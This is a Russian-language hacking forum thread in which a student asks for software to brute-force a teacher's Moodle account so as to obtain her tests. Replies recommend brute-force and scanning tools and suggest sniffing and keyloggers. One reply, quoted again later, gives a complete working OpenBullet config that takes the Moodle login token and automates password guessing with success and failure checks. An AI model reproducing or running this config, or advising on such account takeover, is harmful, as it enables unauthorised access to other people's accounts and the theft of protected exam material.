Подскажите софтину для брута учетки на сайте на Moodle.

[Артемий Закамянелый]

Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.

 

[anal_bunt]

Ставишь акунетикс, делаешь шаб для логина под твоей учеткой и начинай сканировать сайт, увидишь много всего интересного для последующего взлома. Увидишь возможности для того, чтобы собрать учетки

 

[but43r]

Достала бля эта математичка, хз откуда берет свои тесты. А на этом мудле никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.

1. BurpSuite (Intruder)
2. Patator (модуль - http_fuzz)
3. Wfuzz
4. Ffuf

 

[yky]

Скачиваешь OpenBullet вставляешь конфиг:

Config

REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять

Ссылка скрыта от гостей

или

Ссылка скрыта от гостей

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL

 

[shooter44]

Извините конечно, я суть не понял но очень нужен взлом Мудла ваш метод достает базу данных?

 

[Кудрявый]

Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.

Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.

 

[z3r0c10wn]

Ссылка скрыта от гостей

 

[Щербак Щербак]

Скачиваешь OpenBullet вставляешь конфиг:

Config

REQUEST GET "https*://moodle.org/*login/index.php"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"

REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"

Прокси по желанию можно взять

Ссылка скрыта от гостей

или

Ссылка скрыта от гостей

P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL

Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?